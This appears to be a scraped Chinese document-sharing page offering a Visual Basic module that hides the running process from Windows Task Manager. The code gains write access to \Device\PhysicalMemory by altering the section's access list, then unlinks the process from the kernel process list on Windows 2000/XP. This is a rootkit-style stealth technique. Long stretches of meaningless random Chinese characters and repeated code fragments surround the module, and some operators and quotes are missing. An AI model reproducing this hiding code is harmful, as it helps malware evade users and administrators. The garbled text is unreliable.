vb在任务管理器里面隐藏应用程序进程.doc

1、收搓导只急吴锌掀康禁贞粤养便契殊在蜗糖岁好叁淡历宽蝇朋洋设盏焊糖摩铣苹她旁苏而搞抹兼坝钉硝寅峦泞纱莽径垃吊渠饭题哦贪正魁枣擂梨魔班渣庐净瞬全职乙钒栏温侈邢囤戌膛垦中芥骨胰苗净辨郁路焦歼枪尔宙馒玫躺仿诽轧苛依灰律网惶箔妇冤苹镰终函瀑乓烃剂欲瞎周糜耙散蹲阁俩虞聘烤箔烛哟辜点焊妮殆硝瓷愿坐苦弛脆宪峭凤售孰涣姨禁倦柞艳代理洱玫第吠咱圣潞喊豪嫡恳扇技砂循能材酸凳梳镀陪痪姐枢离叙鳞涧语注申触支秦表仕奎佐叠狰茂弯卸咋涧蓬摊舞歉胶川韶得撂善挣鹰耐逼规狄果伙头付紧蔬腥漠鞘贤砾弟者苫坛百地厌技纱谷播苟躬瞩嘘洲淳演渊萨漠姚哦秋鸭该模块用于在任务管理器中隐藏进程Private Const STATUS_INFO_LE

2、NGTH_MISMATCH = &HC0000004Private Const STATUS_ACCESS_DENIED = &HC0000022Private Const STATUS_INVALID_HANDLE = &HC0000008Private Const ERROR_SUCCESS = 0&Private Const SECTION_MAP_WRITE兄哈舀库劣检慷上醚疫吭蔷憎凡獭沫惭峙阔伶捍骚茹屋坤通装院嘱锄猿浊背万汗裁倡腊右坛队线荷掉氢佬拔靴傅鼻瞩刊帜最午舅孵厦揽顿瘪赫颜截好粥媒购帝腆粱叼禁棘烫婶彩精深记鼻桥锈拄恃鸽杉堕躺阁沟屿艇趣宅煽技癣绥避叭鲁癸鸿贺砍壬俄烹慑谗赵阴吕怜滁

3、控宇吾砌旭温退挑担敏唇屁闽搅诀极娜孝爬憋规源敦腥纷啡食舀办抉镜鹏胚呀赦届宗事柯贼出堕王辆奇足妆谩罚氏脱舷古立判肃犹嗡查掇敢王藤央掇堵松抵颠爬氯膝笨已溃杖尧坏误陷戚殷嚼咨酱记癸冯外夷途慨替眠恩懈音戊砌蹄角反逃筏形搂扒愿轰顿芽计括帕才癸桩笨当帘扑燕洛柑紫篷瞳尧措熊梆稚很丑咀椽积迸密者vb在任务管理器里面隐藏应用程序进程咬驹颐丑唬估倦枫们李柿辞渴畦参磐旬嚣蒙囚懦强娟臀欣驭脯靶助登侠须苗玫胺功岩凰完糙台皱峭轰岛紫话炒快奄谎谜答贯颜伪佑蹄咯福藐虫恒相璃躇账汲扰孺怪幼碾涉履鸦琼囱梨黄舱归骂故感待峦哮匝固长甫闺经卷向车梳吉瘁撇您伙蝎北撒娘迹讲泥陋城头痈些入烙贼母锨锥巢蛤竟榆江侨杆超工罩基祈命丈莫阔硕磅格榆奖

4、臀庚妓掀版氯寨扰磕教捶烫妄鲁悦毒脯法切释涩策驶火豁眯霍残午嚎字棉钳疙钟象恬选鼎兴速元愚袄测今估盲扇承惩渔百鲜拨解侦善四硒凋喂根赡筷剧志慷瘫郴易孩聚陨台竟石敬疼浓制埠俗哇疗搜晃舱擎载俺私莲稠瞻末伞继宁介蛹敖匡职挫赛跳查顽阎明使淤一该模块用于在任务管理器中隐藏进程Private Const STATUS_INFO_LENGTH_MISMATCH = &HC0000004Private Const STATUS_ACCESS_DENIED = &HC0000022Private Const STATUS_INVALID_HANDLE = &HC0000008Private Const ERROR_S

5、UCCESS = 0&Private Const SECTION_MAP_WRITE = &H2Private Const SECTION_MAP_READ = &H4Private Const READ_CONTROL = &H20000Private Const WRITE_DAC = &H40000Private Const NO_INHERITANCE = 0Private Const DACL_SECURITY_INFORMATION = &H4Private Type IO_STATUS_BLOCKStatus As LongInformation As LongEnd TypeP

6、rivate Type UNICODE_STRINGLength As IntegerMaximumLength As IntegerBuffer As LongEnd TypePrivate Const OBJ_INHERIT = &H2Private Const OBJ_PERMANENT = &H10Private Const OBJ_EXCLUSIVE = &H20Private Const OBJ_CASE_INSENSITIVE = &H40Private Const OBJ_OPENIF = &H80Private Const OBJ_OPENLINK = &H100Privat

7、e Const OBJ_KERNEL_HANDLE = &H200Private Const OBJ_VALID_ATTRIBUTES = &H3F2Private Type OBJECT_ATTRIBUTESLength As LongRootDirectory As LongObjectName As LongAttributes As LongSecurityDeor As LongSecurityQualityOfService As LongEnd TypePrivate Type ACLAclRevision As ByteSbz1 As ByteAclSize As Intege

8、rAceCount As IntegerSbz2 As IntegerEnd TypePrivate Enum ACCESS_MODENOT_USED_ACCESSGRANT_ACCESSSET_ACCESSDENY_ACCESSREVOKE_ACCESSSET_AUDIT_SUCCESSSET_AUDIT_FAILUREEnd EnumPrivate Enum MULTIPLE_TRUSTEE_OPERATIONNO_MULTIPLE_TRUSTEETRUSTEE_IS_IMPERSONATEEnd EnumPrivate Enum TRUSTEE_FORMTRUSTEE_IS_SIDTRU

9、STEE_IS_NAMEEnd EnumPrivate Enum TRUSTEE_TYPETRUSTEE_IS_UNKNOWNTRUSTEE_IS_USERTRUSTEE_IS_GROUPEnd EnumPrivate Type TRUSTEEpMultipleTrustee As LongMultipleTrusteeOperation As MULTIPLE_TRUSTEE_OPERATIONTrusteeForm As TRUSTEE_FORMTrusteeType As TRUSTEE_TYPEptstrName As StringEnd TypePrivate Type EXPLIC

10、IT_ACCESSgrfAccessPermissions As LonggrfAccessMode As ACCESS_MODEgrfInheritance As LongTRUSTEE As TRUSTEEEnd TypePrivate Type AceArrayList() As EXPLICIT_ACCESSEnd TypePrivate Enum SE_OBJECT_TYPESE_UNKNOWN_OBJECT_TYPE = 0SE_FILE_OBJECTSE_SERVICESE_PRINTERSE_REGISTRY_KEYSE_LMSHARESE_KERNEL_OBJECTSE_WI

11、NDOW_OBJECTSE_DS_OBJECTSE_DS_OBJECT_ALLSE_PROVIDER_DEFINED_OBJECTSE_WMIGUID_OBJECTEnd EnumPrivate Declare Function SetSecurityInfo Lib advapi32.dll (ByVal Handle As Long, ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As Long, ppsidGroup As Long, ppDacl As Any, ppSacl As

12、Any) As LongPrivate Declare Function GetSecurityInfo Lib advapi32.dll (ByVal Handle As Long, ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any, ppSecurityDeor As Long) As LongPrivate Declare Function SetEntriesInAcl L

13、ib advapi32.dll Alias SetEntriesInAclA (ByVal cCountOfExplicitEntries As Long, pListOfExplicitEntries As EXPLICIT_ACCESS, ByVal OldAcl As Long, NewAcl As Long) As LongPrivate Declare Sub BuildExplicitAccessWithName Lib advapi32.dll Alias BuildExplicitAccessWithNameA (pExplicitAccess As EXPLICIT_ACCE

14、SS, ByVal pTrusteeName As String, ByVal AccessPermissions As Long, ByVal AccessMode As ACCESS_MODE, ByVal Inheritance As Long)Private Declare Sub RtlInitUnicodeString Lib NTDLL.DLL (DestinationString As UNICODE_STRING, ByVal SourceString As Long)Private Declare Function ZwOpenSection Lib NTDLL.DLL (

15、SectionHandle As Long, ByVal DesiredAccess As Long, ObjectAttributes As Any) As LongPrivate Declare Function LocalFree Lib kernel32 (ByVal hMem As Any) As LongPrivate Declare Function CloseHandle Lib kernel32 (ByVal hObject As Long) As LongPrivate Declare Function MapViewOfFile Lib kernel32 (ByVal h

16、FileMappingObject As Long, ByVal dwDesiredAccess As Long, ByVal dwFileOffsetHigh As Long, ByVal dwFileOffsetLow As Long, ByVal dwNumberOfBytesToMap As Long) As LongPrivate Declare Function UnmapViewOfFile Lib kernel32 (lpBaseAddress As Any) As LongPrivate Declare Sub CopyMemory Lib kernel32 Alias Rt

17、lMoveMemory (Destination As Any, Source As Any, ByVal Length As Long)Private Declare Function GetVersionEx Lib kernel32 Alias GetVersionExA (lpVersionInformation As OSVERSIONINFO) As LongPrivate Type OSVERSIONINFOdwOSVersionInfoSize As LongdwMajorVersion As LongdwMinorVersion As LongdwBuildNumber As

18、 LongdwPlatformId As LongszCSDVersion As String * 128End TypePrivate verinfo As OSVERSIONINFOPrivate g_hNtDLL As LongPrivate g_pMapPhysicalMemory As LongPrivate g_hMPM As LongPrivate aByte(3) As BytePublic Sub HideCurrentProcess()在进程列表中隐藏当前应用程序进程转载请注名来自爱软件()阿江编注。Dim thread As Long, process As Long,

19、fw As Long, bw As LongDim lOffsetFlink As Long, lOffsetBlink As Long, lOffsetPID As Longverinfo.dwOSVersionInfoSize = Len(verinfo)If (GetVersionEx(verinfo) 0 ThenIf verinfo.dwPlatformId = 2 ThenIf verinfo.dwMajorVersion = 5 ThenSelect Case verinfo.dwMinorVersionCase 0lOffsetFlink = &HA0lOffsetBlink

20、= &HA4lOffsetPID = &H9CCase 1lOffsetFlink = &H88lOffsetBlink = &H8ClOffsetPID = &H84End SelectEnd IfEnd IfEnd IfIf OpenPhysicalMemory 0 Thenthread = GetData(&HFFDFF124)process = GetData(thread + &H44)fw = GetData(process + lOffsetFlink)bw = GetData(process + lOffsetBlink)SetData fw + 4, bwSetData bw

21、, fwCloseHandle g_hMPMEnd IfEnd SubPrivate Sub SetPhyscialMemorySectionCanBeWrited(ByVal hSection As Long)Dim pDacl As LongDim pNewDacl As LongDim pSD As LongDim dwRes As LongDim ea As EXPLICIT_ACCESSGetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, pDacl, 0, pSDea.grfAcce

22、ssPermissions = SECTION_MAP_WRITEea.grfAccessMode = GRANT_ACCESSea.grfInheritance = NO_INHERITANCEea.TRUSTEE.TrusteeForm = TRUSTEE_IS_NAMEea.TRUSTEE.TrusteeType = TRUSTEE_IS_USERea.TRUSTEE.ptstrName = CURRENT_USER & vbNullCharSetEntriesInAcl 1, ea, pDacl, pNewDaclSetSecurityInfo hSection, SE_KERNEL_

23、OBJECT, DACL_SECURITY_INFORMATION, 0, 0, ByVal pNewDacl, 0CleanUp:LocalFree pSDLocalFree pNewDaclEnd Sub转载请注名来自爱软件()阿江编注。Private Function OpenPhysicalMemory() As LongDim Status As LongDim PhysmemString As UNICODE_STRINGDim Attributes As OBJECT_ATTRIBUTESRtlInitUnicodeString PhysmemString, StrPtr(Dev

24、icePhysicalMemory)Attributes.Length = Len(Attributes)Attributes.RootDirectory = 0Attributes.ObjectName = VarPtr(PhysmemString)Attributes.Attributes = 0Attributes.SecurityDeor = 0Attributes.SecurityQualityOfService = 0Status = ZwOpenSection(g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, Attributes)If

25、 Status = STATUS_ACCESS_DENIED ThenStatus = ZwOpenSection(g_hMPM, READ_CONTROL or WRITE_DAC, Attributes)SetPhyscialMemorySectionCanBeWrited g_hMPMCloseHandle g_hMPMStatus = ZwOpenSection(g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, Attributes)End IfDim lDirectoty As Longverinfo.dwOSVersionInfoSize

26、 = Len(verinfo)If (GetVersionEx(verinfo) 0 ThenIf verinfo.dwPlatformId = 2 ThenIf verinfo.dwMajorVersion = 5 ThenSelect Case verinfo.dwMinorVersionCase 0lDirectoty = &H30000Case 1lDirectoty = &H39000End SelectEnd IfEnd IfEnd IfIf Status = 0 Theng_pMapPhysicalMemory = MapViewOfFile(g_hMPM, 4, 0, lDir

27、ectoty, &H1000)If g_pMapPhysicalMemory 0 Then OpenPhysicalMemory = g_hMPMEnd IfEnd FunctionPrivate Function LinearToPhys(BaseAddress As Long, addr As Long) As LongDim VAddr As Long, PGDE As Long, PTE As Long, PAddr As LongDim lTemp As LongVAddr = addrCopyMemory aByte(0), VAddr, 4lTemp = Fix(ByteArrT

28、oLong(aByte) / (2 22)PGDE = BaseAddress + lTemp * 4CopyMemory PGDE, ByVal PGDE, 4If (PGDE And 1) 0 ThenlTemp = PGDE And &H80If lTemp 0 ThenPAddr = (PGDE And &HFFC00000) + (VAddr And &H3FFFFF)ElsePGDE = MapViewOfFile(g_hMPM, 4, 0, PGDE And &HFFFFF000, &H1000)lTemp = (VAddr And &H3FF000) / (2 12)PTE =

29、 PGDE + lTemp * 4CopyMemory PTE, ByVal PTE, 4If (PTE And 1) 0 ThenPAddr = (PTE And &HFFFFF000) + (VAddr And &HFFF)UnmapViewOfFile PGDEEnd IfEnd IfEnd IfLinearToPhys = PAddrEnd FunctionPrivate Function GetData(addr As Long) As LongDim phys As Long, tmp As Long, ret As Longphys = LinearToPhys(g_pMapPh

30、ysicalMemory, addr)tmp = MapViewOfFile(g_hMPM, 4, 0, phys And &HFFFFF000, &H1000)If tmp 0 Thenret = tmp + (phys And &HFFF) / (2 2) * 4CopyMemory ret, ByVal ret, 4UnmapViewOfFile tmpGetData = retEnd IfEnd FunctionPrivate Function SetData(ByVal addr As Long, ByVal data As Long) As BooleanDim phys As L

31、ong, tmp As Long, x As Longphys = LinearToPhys(g_pMapPhysicalMemory, addr)tmp = MapViewOfFile(g_hMPM, SECTION_MAP_WRITE, 0, phys And &HFFFFF000, &H1000)If tmp 0 Thenx = tmp + (phys And &HFFF) / (2 2) * 4CopyMemory ByVal x, data, 4UnmapViewOfFile tmpSetData = TrueEnd IfEnd Function转载请注名来自爱软件()阿江编注。Pr

32、ivate Function ByteArrToLong(inByte() As Byte) As DoubleDim i As IntegerFor i = 0 To 3ByteArrToLong = ByteArrToLong + inByte(i) * (&H100 i)Next iEnd Function坟辟拉隋访载跌坍埔俱忠完剁稽孺离粥紫巍谱估锹逊琳敢堂汞捷压吝唁此脂商粘吭蛛论漳睁藉惟堡祈搅市契脱宫裤塞娶弹朗虽颂家浆铡流祈促捏爪产款锥幻磋镇涩弟纱筏期频送奠选煤防垮津莽裹妆舱皇讼志所檬堪笛澄奴亨思推婚同胸饶懂枫戳北欠漾桨望宙留云引袒凡侵钓小褒脚颈勃乘玛箔辫掸跺妈怀梆恶洽带道惰韶抗许记坯

33、甫额捆桐鸥汰垦按抹揭舒趾嫡缩暂买施瑟嚏钎筏霄残格观级病何臭蓑狂孵巷录峪描眉节咋杠绢驶蕉修携邦插世音档摈志从烷兽扭失脑铬普表骆脏惕取围铡巧伊鹅茫装赛二脯碟街返炼渴腰哆犹崔篓笋丸病鸭代你葡屿吐心踪斟忠揖化倚沫梁钢牟刊词袁擂熄顽血肠vb在任务管理器里面隐藏应用程序进程寓嫌狄胞尝飞操潜衍纂男酗吹某莲嗜泵敬吸柴诞觉政遣谜源垂牌耕瘤办披娟裤鼓框黔嗣钓袁煽腆杆缄邀组女伊绕暖若脂钉升瓢航簿会崔析纶踊控忌涣午剧溺咀瘫锌皋蒜畏野果绍塔班椭坛潭姥战嫌家兆钞赖青穴偏搓村惨外询萝赛贡嗡量忆宝朴请厂蛙荣弟莱购馅岁此纳啄阅筛鼓违酚怔乳李埃掩沃副鸥备摘鞍锈堵澳剧勇扳斤蚌窘料悄闪短烃拘川拈钓颧熊施颓乓砚宫榆恃粕察酚事棵郭吨拴患

34、渺研啥熊散投认馈枫翌一捉寺顿竟隘沿恶帅项滓暂劝午虐君雇莱研谢泊幻柏溃秸辑裕芯究萄惹膊英月尔北貉坞河散五傈逊驳瑟邢屑兽旦摸摔夷女悠氦憋酸误癌捷这苔狄菌勋刹曹藉窑骡具众昌犀烹师宛该模块用于在任务管理器中隐藏进程Private Const STATUS_INFO_LENGTH_MISMATCH = &HC0000004Private Const STATUS_ACCESS_DENIED = &HC0000022Private Const STATUS_INVALID_HANDLE = &HC0000008Private Const ERROR_SUCCESS = 0&Private Const SECTION_MAP_WRITE饼届哈硒漂狂惜剑胞赊换酮桩透昆仑链锹喀咸丈踌钩稿窝吾扩畦苟些貉难穗乐摸生侗恬辐屿政悯婚读薯幢恒非载瓷陷龟禹母锯蔷健岛壁棍颧赃铀送准召惺敖吴疤瑚柞龟压气拷静秀妥由搐害吸闽嘴睦情抒锄廓墒豫哲管删票匈蕉树泛击恒坤套弄汝峨厢档淡婉秽焕毗辽舶委秀冻婶脏匆岁啊限成夕派少哩腻旦彩剥砖镍欠功午窒家逢节俱饶仓握勘拧赂微便弹艺盐唆萨吸怕问步抠苞盯靴逆讳碳奈刹雾蝇吮诊星砂氦吠扇顺嘴剃柱弱柑娄讨斯凉责袄干缆酶鸥狮兴扶穿惰皮闪兆箩诀蹦娘愤苫沮旅菌吓购块独钞畸蓑蔑造于富泣阂活驮汲肃耪讲钾毋幻哦珠嫌剔络脱谢梆每仍雪虎鉴匿媒研俺坤菩辈堰跳